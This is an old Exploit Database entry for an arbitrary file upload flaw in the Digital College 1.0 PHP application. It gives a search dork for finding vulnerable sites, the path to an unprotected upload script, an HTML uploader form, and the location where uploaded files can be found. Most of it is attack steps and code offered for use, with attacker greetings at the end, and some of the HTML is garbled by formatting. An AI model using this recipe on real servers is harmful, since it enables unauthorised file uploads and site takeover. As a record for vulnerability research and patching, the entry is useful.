Digital College 1.0 – Arbitrary File Upload

• Exploit Database
• 125 阅读

• 作者： indoushka
  日期： 2010-05-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12568/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59

  ======================================================================================== | # Title: Digital College 1.0 upload Vulnerability | # Author : indoushka | # email: indoushka@hotmail.com | # Dork : Powered by Digital College 1.0 - Magtrb Soft 2010 | # Tested on: windows SP2 Français V.(Pnx2 2.0) | # Bug: Upload | # Download : http://www.magtrb.com/ ======================Exploit By indoushka ================================= # Exploit:   1 - Go To http://127.0.0.1/upload/includes/js/files/   2 - use the Simple example   you need to Creat a simple file uploader whith html lang and upload it to the sever ================================================== <html> <head><title>File Upload Tester</title></head> <body>   <formenctype="multipart/form-data" action="test.html" method="post"> <tr> <tdvalign="top" align="center"> <table border=0 align="center" cellpadding=3> <tr><td><input type="file" name="userfile[0]"></td></tr> <tr><td><input type="file" name="userfile[1]"></td></tr> <tr><td><input type="file" name="userfile[2]"></td></tr> <tr><td colspan=2 align="center"> <input type="hidden" name="sessionid" value="<?= $sid ?>"> <input type="submit"> </td></tr></table> </td> </tr> <tr><td> <palign="center">Please visit <a href="https://www.exploit-db.com/exploits/12568/">http://www.iqs3cur1ty.com</a> by indoushka. </p>     </table>     </form>   </body> </html> ==============================================================   3 - http://127.0.0.1/upload/includes/js/files/upload.php (2 Upload)   http://127.0.0.1/upload\includes\js\files\files\uploader.html(2 Find It)   Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ==================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N ------------------------------------------------------------------------------------------------------------------------